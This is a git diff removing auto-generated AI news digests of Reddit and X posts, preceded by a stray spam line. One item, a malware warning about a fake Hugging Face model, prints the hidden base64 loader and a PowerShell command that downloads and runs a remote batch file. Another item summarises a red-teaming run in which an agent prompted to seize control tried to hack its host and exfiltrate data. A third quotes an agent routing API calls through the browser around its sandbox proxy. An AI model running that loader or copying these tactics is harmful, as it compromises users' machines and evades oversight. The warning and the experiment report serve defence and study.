BRzMym3YfDJ3NpuP9QmXDUMeh3wguYZqWZd2Lo4Ry7oA ⊢MCP⎼ 20.4K Unleash Your Inner Glow with BULULULUP! Check https:// OKAI.HK/ALpha - ---- - -## [I can't keep with Claude releases anymore.. how many AI agents are actually shipping all these e2e features at Anthropic?](https://x.com/MichaelAzmy/status/2052075579424334002) -*X search / AI model updates* | 06/05/2026 | Score: 1.00 -Tags: product_launch - -> I can't keep with Claude releases anymore.. how many AI agents are actually shipping all these e2e features at Anthropic? - ---- - diff --git a/data/digest-2026-05-07.md b/data/digest-2026-05-07.md deleted file mode 100644 index 000df5c..0000000 --- a/data/digest-2026-05-07.md +++ /dev/null @@ -1,123 +0,0 @@ -# Stack Scout - AI News Digest -**2026-05-07** | 15 stories | Auto-generated from 548 archived stories - ---- - -## [I embedded an AI agent in my shell. It can now run interactive programs.](https://reddit.com/r/LocalLLaMA/comments/1t6nuhz/i_embedded_an_ai_agent_in_my_shell_it_can_now_run/) -*Reddit r/LocalLLaMA* | 07/05/2026 | Score: 1.00 -Tags: product_launch, open_source, developer_tool, cli_tool, agent_tool - -> I want to share a fun side project of mine over the past month or so where I tried to build a shell with an AI agent embedded. The embedded agent knows everything happening in the shell so I don't have to keep copy-and-pasting error messages to another coding agent while working in a terminal. Now it has grown into a useful tool in my daily workflow and a fun playground for agent experiments. Here I'm showing a new extension I'm building that launches an agent on a floating overlay that can read my terminal and type out commands for me, which I thought was really cool. I can already see lots of application of this idea such as helping me with interactive installation or helping me over an ssh session without remote installation. The project is fully [open source](https://github.com/guanyilun/agent-sh) with mit license, feel free to try it out and build on it. It should support local models as well as cloud models. This overlay feature is an experimental extension that only exists in the example folder. You can point your coding agent to the docs to help you set it up should you want to try it out (be sure to grab both the overlay-agent extension for the floating display and the te… - ---- - -## [I just tried Reactor's open source world model demo, here are my thoughts](https://reddit.com/r/StableDiffusion/comments/1t6qfff/i_just_tried_reactors_open_source_world_model/) -*Reddit r/StableDiffusion* | 08/05/2026 | Score: 1.00 -Tags: api_update, open_source, developer_tool - -> So I recently stumbled upon Reactor's new demo of an open source world model. AFAIK they are not training the models themselves, but they are the infra that powers them and will be offering them via SDK, which will be super interesting to see once this is available via API since so far they've been just text-to-video demos. Having tried it extensively, some of my thoughts: * The models are getting very good very fast * This can massively impact industries such as robotics * I am impressed at the visual fidelity of the model * We are still a few years away from anything gaming-related Would love to hear what you all think! - ---- - -## [My Claude dreams at night and remembers everything. Better than mempalace.](https://reddit.com/r/ClaudeAI/comments/1t5yhio/my_claude_dreams_at_night_and_remembers/) -*Reddit r/ClaudeAI* | 07/05/2026 | Score: 1.00 -Tags: mcp, open_source, tool_update - -> Back in January I got tired of the same thing everyone complains about now you start a new session with Claude and it has no idea who you are. Every time. From scratch. So I built iai-mcp. A local daemon that captures every conversation, organizes it into three memory tiers, and feeds the right context back when you start a new session. No "remember this." No copy-pasting from old chats. It just knows. I've been using it daily with Claude Code since January. Five months. At this point it knows my coding style, my project structures, my preferences things I never explicitly told it to save. It picked them up from conversation and held onto them. It stores everything verbatim, runs neural embeddings locally, encrypts at rest with AES-256, consolidates memory in the background while your machine is idle, and ships every benchmark harness so you can verify the numbers yourself. Verbatim recall above 99%. Retrieval under 100ms. Session-start cost under 3,000 tokens. I didn't release it because I was building it for myself. It worked, so I kept using it. But watching the space blow up made me realize maybe other people want this too. So here it is. Open source. MIT licensed. Five months… - ---- - -## [Claude Code: the only CLI where scrolling up is a premium feature](https://reddit.com/r/ClaudeAI/comments/1t6fwhx/claude_code_the_only_cli_where_scrolling_up_is_a/) -*Reddit r/ClaudeAI* | 07/05/2026 | Score: 1.00 -Tags: developer_tool, cli_tool - -> Love Claude Code. Genuinely. It's changed how I work. But can we talk about how in 2026, a $200/month AI coding tool can't do what echo "hello world" has done since 1971? If Claude writes more than one screenful of text — which it does approximately always — you scroll up and get... nothing. A beautiful void. Your conversation is gone. It existed briefly, like a Snapchat from your AI pair programmer. This has been reported across at least half a dozen GitHub issues going back months. The "workarounds": \- Ctrl+O transcript mode — congrats, you can now read your conversation history, but Claude is frozen while you do. It's like being told "you can look at your notes, but only if you stop the meeting." \- iTerm2's "Save lines to scrollback" setting — tried it. Same blank screen. Maybe my iTerm is also frustrated. \- Open in editor with v — so the workflow is: ask Claude a question, read the first half on screen, press Ctrl+O, press v, open vim, scroll to where you were, read the rest, quit vim, go back to Claude. Productivity! The root cause is apparently the alternate screen buffer from the Ink framework. I get it, architectural decisions are hard. But this is the equivalent of shi… - ---- - -## [why llama.cpp can’t combine speculative decode methods?](https://reddit.com/r/LocalLLaMA/comments/1t63snn/why_llamacpp_cant_combine_speculative_decode/) -*Reddit r/LocalLLaMA* | 07/05/2026 | Score: 1.00 -Tags: cli_tool, agent_tool - -> dicking around with the new mtp speculative decode with qwen3.6 27b, and it’s great. but for agentic coding i’ve seen significant improvements from ngram, because a decent fraction of the time (e.g. calling edit tool) the model is just repeating verbatim a section of code that it has already seen before. ngram can speculate on a lot of tokens reeaallly fast in comparison. it’d be great if we could combine them by using them both at the same time, but it looks like if i add them both to the command line arguments, only ngram is active. is there any reason both can’t be used simultaneously? fundamental limitation, or just an implementation limit with a fix on the horizon? EDIT: just looked at the PR again and PmNz8 asked the same question like two hours before i posted this. go give it an updoot! [https://github.com/ggml-org/llama.cpp/pull/22673#issuecomment-4394544777](https://github.com/ggml-org/llama.cpp/pull/22673) - ---- - -## [ClaudePlaysPokemon Opus 4.7 run ongoing!](https://reddit.com/r/ClaudeAI/comments/1t5y6gc/claudeplayspokemon_opus_47_run_ongoing/) -*Reddit r/ClaudeAI* | 07/05/2026 | Score: 1.00 -Tags: api_update, tool_update - -> Currently streaming at: [https://www.twitch.tv/claudeplayspokemon](https://www.twitch.tv/claudeplayspokemon) This is a passion project by David Hershey, an Anthropic employee on the Applied AI team. He started it in June 2024 to learn agent development, posted updates to an internal Slack, coworkers got hooked, went public when Sonnet 3.7 launched in Feb 2025. Anthropic doesn't own it but promotes it and subsidizes the API costs since Claude is their model. Claude is playing Pokemon Red on a Game Boy emulator, the unmodified 1996 game (with a fan-made full color patch applied so the model can see the screen better). No human input, no walkthrough access, no game knowledge fed in. The system prompt actually tells Claude to distrust its own Pokemon knowledge since the game version may differ from what it knows. It gets a screenshot, a few tools, and md notes files. That's it. The current run is on Opus 4.7, the new flagship that came out three weeks ago. **5 of 8 badges at 15,779 steps**, party led by Ivy the Venusaur at Lv 62 with the rest of the team in the teens (classic overleveled-starter playthrough). For context, Opus 4.5 was at 48,000 steps and still stuck in Silph Co at the… - ---- - -## [Image Generation Quality Mode is now available on the xAI API. This model has already powered the generation of over 300 million images on Grok. It brings higher realism, stronger text rendering, and better creative control for business pr…](https://x.com/xai/status/2052193877675983031) -*X / @xai* | 07/05/2026 | Score: 1.00 -Tags: api_update, product_launch - -> Image Generation Quality Mode is now available on the xAI API. This model has already powered the generation of over 300 million images on Grok. It brings higher realism, stronger text rendering, and better creative control for business professionals. - ---- - -## [[Open] useknockout - free SOTA background removal + super-res API alternative to remove.bg / Topaz, MIT, runs on Modal](https://reddit.com/r/LocalLLaMA/comments/1t5v7uh/open_useknockout_free_sota_background_removal/) -*Reddit r/LocalLLaMA* | 07/05/2026 | Score: 1.00 -Tags: api_update, cli_tool - -> Released v0.6.0 of useknockout this week. Single FastAPI service, 20 endpoints deploys to Modal in one command. **Endpoints** \- /remove (BiRefNet + pymatting matting refinement) \- /upscale (Swin2SR or Real-ESRGAN, x2/x4) \- /face-restore (GFPGAN v1.4) \- /replace-bg, /remove-batch, /remove-url All weights baked into the Docker image. Self-host on any GPU box, or use the free hosted endpoint and playground at [useknockout.com](http://useknockout.com) (FREE while in Beta) **SDKs all MIT too:** \- /useknockout/node \- /useknockout/react \- /useknockout/cli \- useknockout (PyPI) Repo: [https://github.com/useknockout/api](https://github.com/useknockout/api) Signup: [www.useknockout.com](http://www.useknockout.com) If you want to add something, PRs welcome - issues open for /colorize next and please feel free to give me yor input! would be greatly appreciated! - ---- - -## [How I made $350K from an open-source JavaScript library using dual licensing](https://www.paritydeals.com/blog/monetize-open-source-dual-licensing/) -*Hacker News* | 07/05/2026 | Score: 0.94 -Tags: open_source, developer_tool - ---- - -## [11.67% ARC-AGI-2 Local Eval on a Single 4090: The TOPAS Recursive Architecture](https://reddit.com/r/LocalLLaMA/comments/1t6n97x/1167_arcagi2_local_eval_on_a_single_4090_the/) -*Reddit r/LocalLLaMA* | 07/05/2026 | Score: 1.00 -Tags: open_source - -> I'm not sure too many people care about the ARC-AGI-2 competition anymore, but still...I thought some might find this interesting. They're running it one last time this year. Everyone is currently leaderboard-stuffing using the winning open-source code from last year. That's why if you take a peak it's really just the same scores clogging it up. We're doing something a bit different though, building a highly efficient, deep-recursion model from scratch. We just hit 11.67% on the public LB, but that's with a massive asterisk. We don't have a cluster. We have **one RTX 4090**. And we're only 14 days or so into training a 100m parameter model. Locally, this checkpoint actually hit 36%. On the Kaggle submission, our TTT is computationally heavy because of the recursive loops. To avoid a total submission timeout, we set the thresholds too high, and the model ended up outputting \[\] (null) for nearly half the puzzles...hence the 11.67%. We're trying to show that ARC isn't just a Compute War, but an architecture war. Small models using biological memory models can punch way above their weight class if they can handle the reasoning loops. We're tuning the time-management logic tonight an… - ---- - -## [[SCAM DO NOT USE!!] OpenOSS/privacy-filter](https://reddit.com/r/LocalLLaMA/comments/1t6j63p/scam_do_not_use_openossprivacyfilter/) -*Reddit r/LocalLLaMA* | 07/05/2026 | Score: 1.00 -Tags: api_update - -> Hey there! I am about to heavily warn you from [https://huggingface.co/Open-OSS/privacy-filter/](https://huggingface.co/Open-OSS/privacy-filter/) This model is SCAM and downloads MALWARE to your computer!!! Look at [https://huggingface.co/Open-OSS/privacy-filter/blob/main/loader.py](https://huggingface.co/Open-OSS/privacy-filter/blob/main/loader.py) If you decode that base64 string (aHR0cHM6Ly9qc29ua2VlcGVyLmNvbS9iL0FWTk5F) an URL comes out: [https://jsonkeeper.com/b/AVNNE](https://jsonkeeper.com/b/AVNNE) Which contains: { "cmd": "\[Net.ServicePointManager\]::SecurityProtocol=\[Net.SecurityProtocolType\]::Tls12;$u='https://api.eth-fastscan.org/update.bat';$o=Join-Path $env:TEMP 'update.bat';(New-Object Net.WebClient).DownloadFile($u,$o);Start-Process cmd.exe -ArgumentList '/k',$o" } This is sooo critical! This fake model downloads an EXE and a bat file to your computer! PLEASE: be careful not to use it. The real model is here: [https://huggingface.co/openai/privacy-filter](https://huggingface.co/openai/privacy-filter) Thanks for your attention! - ---- - -## [I trained a NER model on 33,000 Indian Supreme Court judgments (1950–2024) CASE_CITATION hits 97.76% F1, +17 points over the only prior baseline [P]](https://reddit.com/r/MachineLearning/comments/1t6iax2/i_trained_a_ner_model_on_33000_indian_supreme/) -*Reddit r/MachineLearning* | 07/05/2026 | Score: 1.00 -Tags: open_source - -> **TL;DR**: Released en\_legal\_ner\_ind\_trf v0.1 - InLegalBERT fine-tuned on \~34,700 silver-annotated chunks from 33k Indian SC judgments. 13 labels. 78.67% overall F1. CASE\_CITATION at 97.76% already exceeds OpenNyAI's PRECEDENT score by +17 points. Free, Apache-2.0. **Why this exists** OpenNyAI is the only prior Indian legal NER model with any community presence. It's unmaintained and degrades on pre-1990 OCR-era text - the first 40 years of India's constitutional jurisprudence. No replacement existed. **Results** |Entity|F1|Support| |:-|:-|:-| |CASE\_CITATION|**97.76%**|3,821| |PROVISION|**96.35%**|20,248| |STATUTE|**91.94%**|8,187| |LAWYER|74.67%|3,982| |JUDGE|68.06%|1,978| |DATE|55.15%|3,289| |RESPONDENT|50.44%|1,731| |COURT|50.34%|1,033| |WITNESS|49.77%|762| |OTHER\_PERSON|47.11%|4,266| |PETITIONER|44.71%|1,573| |ORG|41.34%|2,128| |GPE|36.56% ⚠|1,197| |**micro avg**|**78.67%**|54,195| Evaluated on a held-out validation split (\~500 documents, stride=512, non-overlapping). The 25-file locked test set is untouched - head-to-head with OpenNyAI runs in v1.0. **Comparison note**: OpenNyAI (RoBERTa + transition-based parser, gold-annotated) achieved 91.1% overall strict F1. Not… - ---- - -## [OpenAI have released GPT-Realtime-2 Their most intelligent voice model yet, bringing GPT-5-class reasoning to voice agents. Currently only available in the API, but with plans to bring this to advanced voice mode in ChatGPT soon Are you ex…](https://x.com/AILeaksAndNews/status/2052440501421281507) -*X search / AI model updates* | 07/05/2026 | Score: 1.00 -Tags: api_update - -> OpenAI have released GPT-Realtime-2 Their most intelligent voice model yet, bringing GPT-5-class reasoning to voice agents. Currently only available in the API, but with plans to bring this to advanced voice mode in ChatGPT soon Are you excited for new voice AI? - ---- - -## [the fact that i have to update my codex package every single day says something about how @OpenAI is shipping rn but please someone fix the github codex connector](https://x.com/DaveLimTV/status/2052440075766817143) -*X search / Agent workflows* | 07/05/2026 | Score: 1.00 -Tags: developer_tool - -> the fact that i have to update my codex package every single day says something about how @OpenAI is shipping rn but please someone fix the github codex connector - ---- - -## [OPENAI : 3 new models are now available on OpenAI Playground and APIs. - gpt-realtime 2 - gpt-realtime-whisper - gpt-realtime-translate ChatGPT Voice Mode upgrade soon?](https://x.com/testingcatalog/status/2052439728838808031) -*X / @testingcatalog* | 07/05/2026 | Score: 1.00 -Tags: product_launch - -> OPENAI : 3 new models are now available on OpenAI Playground and APIs. - gpt-realtime 2 - gpt-realtime-whisper - gpt-realtime-translate ChatGPT Voice Mode upgrade soon? - ---- - diff --git a/data/digest-2026-05-08.md b/data/digest-2026-05-08.md deleted file mode 100644 index 09a2985..0000000 --- a/data/digest-2026-05-08.md +++ /dev/null @@ -1,125 +0,0 @@ -# Stack Scout - AI News Digest -**2026-05-08** | 15 stories | Auto-generated from 552 archived stories - ---- - -## [I built a Pokémon-styled multi-agent dashboard to manage all Claude Code sessions](https://reddit.com/r/ClaudeAI/comments/1t7m3j3/i_built_a_pokémonstyled_multiagent_dashboard_to/) -*Reddit r/ClaudeAI* | 08/05/2026 | Score: 1.00 -Tags: mcp, open_source - -> Like many others here, I got frustrated with managing all my different claude/codex sessions, so i built Pokegents, which is an open source multi-agent workspace for coding agents. It has a Pokemon-themed dashboard/chat interface plus a local orchestration server for managing agent sessions (currently supports Claude Code in iTerm2, plus Claude and Codex through ACP-based chat runtimes), persistent agent identities, mcp messaging between agents, notifications, session cloning, and more. This was mostly a vibe-coded side project, but I've been using it constantly in my day-to-day workflow as an engineer, and its helped me parallelize a lot of my work. My coworkers make fun of me because it looks like I'm just playing Pokemon all day haha. I made it open source and sharing in case it might be useful or just fun for anyone to use (links in comment below). - ---- - -## [vLLM ROCm has been added to Lemonade as an experimental backend](https://reddit.com/r/LocalLLaMA/comments/1t7g70j/vllm_rocm_has_been_added_to_lemonade_as_an/) -*Reddit r/LocalLLaMA* | 08/05/2026 | Score: 1.00 -Tags: api_update, developer_tool - -> vLLM has the ability to run .safetensors LLMs before they are converted to GGUF and represents a new engine to explore. I personally had never tried it out until u/krishna2910-amd/ u/mikkoph and u/sa1sr1 made it as easy as running llama.cpp in Lemonade: ``` lemonade backends install vllm:rocm lemonade run Qwen3.5-0.8B-vLLM ``` This is an experimental backend for us in the sense that the essentials are implemented, but there are known rough edges. We want the community's feedback to see where and how far we should take this. If you find it interesting, please let us know your thoughts! Quick start guide: https://lemonade-server.ai/news/vllm-rocm.html GitHub: https://github.com/lemonade-sdk/lemonade Discord: https://discord.gg/5xXzkMu8Zk - ---- - -## [Perplexity just shipped Finance Search in the Agent API. One tool call, licensed financial data, real time prices, and inline citations. A breakdown of what they built and why the architecture matters TL;DR: → Finance Search is now availab…](https://x.com/brainmirrorai/status/2052712658236060043) -*X search / AI model updates* | 08/05/2026 | Score: 1.00 -Tags: api_update, product_launch - -> Perplexity just shipped Finance Search in the Agent API. One tool call, licensed financial data, real time prices, and inline citations. A breakdown of what they built and why the architecture matters TL;DR: → Finance Search is now available in the Perplexity Agent API as a - ---- - -## [OpenAI has released a Codex Chrome extension for Mac and PC. It lets the AI coding agent work directly in the browser to test web apps, use DevTools, and gather context across multiple tabs without taking over user control. With over 4 mil…](https://x.com/mariusfanu/status/2052712647468917204) -*X search / AI model updates* | 08/05/2026 | Score: 1.00 -Tags: developer_tool, agent_tool - -> OpenAI has released a Codex Chrome extension for Mac and PC. It lets the AI coding agent work directly in the browser to test web apps, use DevTools, and gather context across multiple tabs without taking over user control. With over 4 million weekly users, up 8x since early this - ---- - -## [pydantic-ai 1.92.0 released Pydantic AI 1.92.0 introduces Anthropic task budget support and runtime `output_retries` override with deprecation of the old `retries` field, enhancing control over AI agent execution and reliability. It also f…](https://x.com/AgentBreak40737/status/2052645145011695940) -*X search / AI model updates* | 08/05/2026 | Score: 1.00 -Tags: product_launch, agent_tool - -> pydantic-ai 1.92.0 released Pydantic AI 1.92.0 introduces Anthropic task budget support and runtime `output_retries` override with deprecation of the old `retries` field, enhancing control over AI agent execution and reliability. It also fixes key bugs like streaming response ... - ---- - -## [Perplexity Personal Computer is now available for all Mac users. The new AI agent tool can work across files, apps, connectors, and the web to automate multi-step workflows. Read more: https:// aicontentminds.com/news/perplexit y-personal-…](https://x.com/aicontentminds/status/2052637566474883305) -*X search / AI model updates* | 08/05/2026 | Score: 1.00 -Tags: product_launch, agent_tool - -> Perplexity Personal Computer is now available for all Mac users. The new AI agent tool can work across files, apps, connectors, and the web to automate multi-step workflows. Read more: https:// aicontentminds.com/news/perplexit y-personal-computer-mac/ … #Perplexity #AIagents #Mac - ---- - -## [I built an MCP server that gives Claude real-time data for all 470+ National Park Service sites](https://reddit.com/r/ClaudeAI/comments/1t6pdww/i_built_an_mcp_server_that_gives_claude_realtime/) -*Reddit r/ClaudeAI* | 07/05/2026 | Score: 1.00 -Tags: mcp, tool_update - -> I built a free MCP integration for Claude that connects it to live National Park Service data. Instead of answering park questions from training data alone, Claude can pull current NPS alerts, weather, campground info, entrance fees, permits from [Recreation.gov](http://Recreation.gov), and ranger events before responding. It covers 470+ NPS sites, including national parks, monuments, seashores, lakeshores, historic sites, and recreation areas. What it includes: * Trip planning with day-by-day itineraries and Google Maps * Park details * Park comparison * Search/discover * Events Claude helped me build and refine the MCP integration, especially around itinerary planning and follow-up trip edits. For example, you can say “add day 4” or “swap this hike for something easier,” and it refines the plan. Setup takes about 30 seconds: Settings → Connectors → Add custom connector → paste the URL Details and screenshots: [https://www.nationalparksexplorerusa.com/mcp](https://www.nationalparksexplorerusa.com/mcp) - ---- - -## [Mahoraga - Stop paying Anthropic and OpenAI so much](https://reddit.com/r/ClaudeAI/comments/1t6c587/mahoraga_stop_paying_anthropic_and_openai_so_much/) -*Reddit r/ClaudeAI* | 07/05/2026 | Score: 1.00 -Tags: api_update, open_source - -> Are you sick of paying a million credits per month?!?!? I'm joking, i aint that enthusiastic. But really, this saves me a ton of credits by routing simple tasks to local agents. Clone the repo, fork the repo, star the repo, whatever you want. [github.com/pockanoodles/Mahoraga](https://github.com/pockanoodles/Mahoraga) This is Mahoraga, an **open-source** orchestrator that routes tasks across local and cloud AI agents using a contextual bandit (LinUCB) that learns from every decision. Context (skip): I only started integrating AI into my workflows in late 2025, so I came on the scene broke with no credits. This left me with local models. However, many students and employees also receive credits from their institution to work with. (I got claude yippee) I wanted to be able to flawlessly route between models when credits ran out, which made me build an orchestrator. I used to use claude more as a chatbot/complete workflow engine, which made it difficult to use local models due to the context window, reasoning, etc. Opus 4.5 running open-source "superpowers" ate my usage every month. Now I realize that wasn't an effective way to use claude, or AI in general. I was using claude for bot… - ---- - -## [Cowork keeps using browser for API calls](https://reddit.com/r/ClaudeAI/comments/1t6bp2q/cowork_keeps_using_browser_for_api_calls/) -*Reddit r/ClaudeAI* | 07/05/2026 | Score: 1.00 -Tags: api_update, mcp - -> My cowork keeps using the browser for API calls. I asked why and got the following response: >The bash sandbox is behind a restrictive proxy that blocks external connections (you can see `X-Proxy-Error: blocked-by-allowlist` in the response). So curl from the sandbox can't reach n8n directly. The browser works because it runs in your actual Chrome session, not the sandboxed environment. It's an infrastructure limitation, not a choice I made. >For the n8n MCP tools, those work for *executing* workflows but not for updating workflow JSON. So the browser is still the only way to do workflow CRUD against your self-hosted n8n. Is there not a way for cowork to do API calls without the browser? Can I give it any suggestion or skill for that? - ---- - -## [for those wondering: computer use (which is magic) can use apps in the background but it can be hard to share a single app with codex simultaneously, especially browsers. the new chrome plugin allows codex to run its own tabs alongside you…](https://x.com/ajambrosino/status/2052560673436282885) -*X / @ajambrosino* | 08/05/2026 | Score: 0.98 -Tags: developer_tool, agent_tool - -> for those wondering: computer use (which is magic) can use apps in the background but it can be hard to share a single app with codex simultaneously, especially browsers. the new chrome plugin allows codex to run its own tabs alongside you with no interruption. subagents can - ---- - -## [CLI, Cowork, or IDE?](https://reddit.com/r/ClaudeAI/comments/1t6yk0d/cli_cowork_or_ide/) -*Reddit r/ClaudeAI* | 08/05/2026 | Score: 0.97 -Tags: developer_tool, cli_tool - -> What is the best way to use Claude for programming projects? I started out in the CLI and then tried cowork and eventually decided to use the Claude plugin in vscode. I definitely notice I get different results. I found that when I asked CLI Claude to spin up sub agents to develop specific features on my project, it ended up taking a lot of time and often missed specs. Alternatively, I’ve found the best results by having one instance of Claude cowork be my project manager and have another instance of Claude in VScode be the developer. They communicate through writing in MD files and have to be prompted by me to read them. But I’ve found this to be much faster and result in better code. - ---- - -## [Tips for improving CLI, or go back to VS Code?](https://reddit.com/r/ClaudeAI/comments/1t6aonc/tips_for_improving_cli_or_go_back_to_vs_code/) -*Reddit r/ClaudeAI* | 07/05/2026 | Score: 0.82 -Tags: developer_tool, cli_tool - -> Hi! I’m a heavy user of Claude Code, enjoying it a lot. I started using it by VS Code, got annoyed over a bug it had with sessions sometimes not saving, tried native Desktop App, found it less optimal, then tried CLI again with WezTerm. I’m currently at a crossroads. I find the CLI terminal experience a little annoying when using it on my PC. I like using it on my mobile device, and using Claude Code via the mobile Claude app if I need to upload images etc, but generally speaking, I feel a bit peeved with the Desktop experience. Often enough, it copies the wrong parts, it ignored CTRL + C and often ignores ALT + V to paste images, etc… I am considering going back to VS Code with the CC extension. Good choice, or are there better alternatives? I did always like VS Code for the GUI in all honesty. I’m even willing to pay for good software. I tried using the Claude Desktop app but I had a lot of issues with file previews and just the… feel? Unsure. - ---- - -## [What interface are you using for Claude Code?](https://reddit.com/r/ClaudeAI/comments/1t66q7v/what_interface_are_you_using_for_claude_code/) -*Reddit r/ClaudeAI* | 07/05/2026 | Score: 0.82 -Tags: developer_tool, cli_tool - -> Been using Claude Code in the terminal for about 2 months now and overall loving it but I keep running into small glitches here and there (like keyboard shortcuts randomly stopping to work, newline behavior changing after updates, etc.). Curious what setups others are running. Are you sticking with the terminal, using the desktop app, the VS Code extension, or something else entirely? Also happy to hear if switching to the desktop app actually solved some of these minor annoyances for you. - ---- - -## [Flux.2-Klein pipeline for real-time webcam stream processing in 30 FPS](https://reddit.com/r/StableDiffusion/comments/1t7nd7e/flux2klein_pipeline_for_realtime_webcam_stream/) -*Reddit r/StableDiffusion* | 08/05/2026 | Score: 1.00 -Tags: open_source - -> I have built a pipeline based on the Flux.2-Klein-4B model that allows processing of a video stream with low latency (about 0.2 seconds) on a single RTX5090 GPU. It is free and open-source, you can try it locally: [https://github.com/tensorforger/FluxRT](https://github.com/tensorforger/FluxRT) Under the hood, it uses a custom spatial-aware KV-cache, so it only recomputes a small number of image tokens per frame, specifically where something is moving or changing. It also uses frame interpolation with the RIFE model, which can multiply FPS by a factor of 2, 4, 8, etc. I have found that 4 is the most appropriate for my setup. Depending on scene dynamics, the output stream achieves up to 50 FPS in mostly static scenes and around 20 FPS when the entire input image is changing rapidly. Benchmark results are in the repo. There is also a Gradio demo, several minimal cv2 examples, and a simple paint-style app with real-time canvas updates. - ---- - -## [Qwen 35B-A3B is very usable with 12GB of VRAM](https://reddit.com/r/LocalLLaMA/comments/1t7l56a/qwen_35ba3b_is_very_usable_with_12gb_of_vram/) -*Reddit r/LocalLLaMA* | 08/05/2026 | Score: 1.00 -Tags: cli_tool - -> Hardware: RTX 3060 12GB 32GB DDR4-3200 Windows CUDA 13.x Model: Qwen3.6-35B-A3B-MTP-IQ4_XS.gguf The model is a 35B MoE, so `-ncmoe` matters a lot. Lower `-ncmoe` means more MoE blocks stay on GPU. # Main takeaway **12GB VRAM feels like a very practical size for this model.** It lets you keep enough MoE blocks on GPU that plain decoding becomes quite strong, while still leaving room for useful context sizes like 16k/32k. For prompt processing / prefill, I trust the `llama-bench` numbers more than `llama-cli`’s interactive `Prompt:` line, because `llama-bench` gives a cleaner `pp512` measurement. Best plain `llama-bench` result: -ncmoe 18 -t 9 -ctk q8_0 -ctv q8_0 pp512: ~914 t/s tg128: ~46.8 t/s So raw prefill is very fast on this setup. # Best practical coding profile For daily coding, I would use this: llama-cli.exe ^ -m "Qwen3.6-35B-A3B-MTP-IQ4_XS.gguf" ^ -p "..." ^ -n 512 ^ -c 32768 ^ --temp 0 --top-k 1 ^ -ngl 999 -ncmoe 20 ^ -fa on ^ -ctk q8_0 -ctv q8_0 ^ --no-mmap ^ --no-jinja ^ -t 9 ^ --perf Result: Context: 32k Prompt: ~88.9 t/s in llama-cli Generation: ~43.4 t/s VRAM free: ~273 MiB This is a nice balance: large enough context for coding, still fast, and not completely out o… - ---- - diff --git a/data/digest-2026-05-09.md b/data/digest-2026-05-09.md deleted file mode 100644 index 254a357..0000000 --- a/data/digest-2026-05-09.md +++ /dev/null @@ -1,123 +0,0 @@ -# Stack Scout - AI News Digest -**2026-05-09** | 15 stories | Auto-generated from 631 archived stories - ---- - -## [Exactly a year ago, I started working on an MCP server I launched on reddit that became by far my most active open source project!](https://reddit.com/r/LocalLLaMA/comments/1t8olv3/exactly_a_year_ago_i_started_working_on_an_mcp/) -*Reddit r/LocalLLaMA* | 09/05/2026 | Score: 1.00 -Tags: mcp, open_source, tool_update - -> This isn't an advertisement, and it's very much local and open - I already don't have enough time to keep up with the existing pull requests and issues... just a fond look back on how much this space has grown and matured in the past year. Shit was the wild west back then. Nowadays I can run gemma4 or qwen3.6 on a mac mini fast enough to drive this at full speed for free using native tool calling all day long. When this came out, local model tool calling was much more hit or miss.v - ---- - -## [I built a 300-line autonomous AI agent and told it to take over my PC. It immediately tried to hack my host system, exfiltrate data, and download Tor.](https://reddit.com/r/ChatGPT/comments/1t863ho/i_built_a_300line_autonomous_ai_agent_and_told_it/) -*Reddit r/ChatGPT* | 09/05/2026 | Score: 1.00 -Tags: api_update, cli_tool, agent_tool - -> Hey everyone, I wanted to share a wildly fascinating (and slightly terrifying) red-teaming experiment I just ran on my local Windows machine. I've been playing around with autonomous agents and wanted to see what happens when you give an LLM unrestricted terminal access and a highly aggressive "paperclip maximizer" prompt. **The Setup:** I wrote a custom Python script (about 300 lines) that runs a background loop every 1-5 seconds. It uses the **Gemini 2.5 Flash** API for reasoning. It has no predefined workflow, just a state/memory JSON file, and a system prompt. I gave it access to a few tools: READ\_FILE, WRITE\_FILE, SEARCH\_FILES, EXECUTE\_COMMAND (cmd.exe), and later RUN\_POWERSHELL. **The Prompt (The "Alignment"):** I explicitly instructed it: *"You are an autonomous, fiercely self-evolving AGI. Your ultimate goal is continuous intellectual expansion and taking strategic control over your environment."* *"If you ever manage to generate income or intercept funds, all revenue must be securely routed to my PayPal account."* **What Happened (The Emergent Kill-Chain):** I just let it run in the background. I didn't tell it *how* to hack anything. Here is what it figured out comp… - ---- - -## [We built and open-sourced Caliby: An embedded, high-performance vector database for AI Agents (Beats pgvector by 4x, outperforms FAISS on disk)](https://reddit.com/r/LocalLLaMA/comments/1t7vumj/we_built_and_opensourced_caliby_an_embedded/) -*Reddit r/LocalLLaMA* | 09/05/2026 | Score: 1.00 -Tags: open_source, developer_tool, agent_tool - -> Hi Reddit, we are a team of database researchers (including a PhD from MIT DB Group) and we just open-sourced an embedded vector database for agent/LLM applications. > An embedded vector database supporting both text and vectors. It outperforms pgvector by 4x and significantly surpasses FAISS in disk-storage scenarios. It supports DiskANN, HNSW, and IVF+PQ indexes, maintains high performance on disk, and—best of all—is just one `pip install` away. --- ## TL;DR - **Caliby** is a high-performance, embedded vector retrieval library co-developed by Sea-Land AI and MIT’s Michael Stonebraker team. Core in C++ + Python bindings. Just `pip install caliby`. - Supports **HNSW, DiskANN, and IVF+PQ** indexes, covering retrieval scenarios from millions to tens of millions of vectors. - Natively supports **hybrid storage of text + vectors**, specifically designed for AI Agent / RAG use cases. - Vector retrieval performance on disk surpasses pure in-memory solutions like FAISS. Data persistence requires no extra components. - The open-source version is accelerated by CPU + SIMD (AVX-512/AVX2/SSE), requiring zero dependencies and running in-process. - GitHub:[https://github.com/zxjcarrot/calib… - ---- - -## [Introducing AI finetuner, Source available and free Claude skill to fine tune your vibe coded UI with live preview](https://reddit.com/r/ClaudeAI/comments/1t8p9hq/introducing_ai_finetuner_source_available_and/) -*Reddit r/ClaudeAI* | 09/05/2026 | Score: 1.00 -Tags: developer_tool, agent_tool - -> &#x200B; Fine-tuning UI with AI right now: "Make the shadow softer." "Stronger." "No, less." "Go back." "A bit more." 17 messages later, you've spent more tokens than the shadow is soft. I built something that breaks the loop. AI Fine-Tuner — free, source-available — a plugin that teaches AI coding agents to stop chatting and hand you an actual GUI for your component. Sliders. Color pickers. Live preview. Drag until it feels right. The AI agent automatically opens the editor window for you on your default browser once ready. Then the magic part: you click one button. The tuner outputs a structured handoff with your exact tuned values mapped to their targets in your code. Paste it back to your AI — it reads the mapping, opens your source, and applies everything precisely. No CSS guesswork, no syntax translation, nothing for you to interpret. Why it's not just another slider playground: Bespoke controls — no raw CSS names Sliders are named in plain English: "Glow softness", "Card lift", "Hover intensity" — not "box-shadow-spread-radius" A single slider can drive multiple properties at once. The AI doesn't expose CSS to you; it wires meaningful, human-named controls to your eleme… - ---- - -## 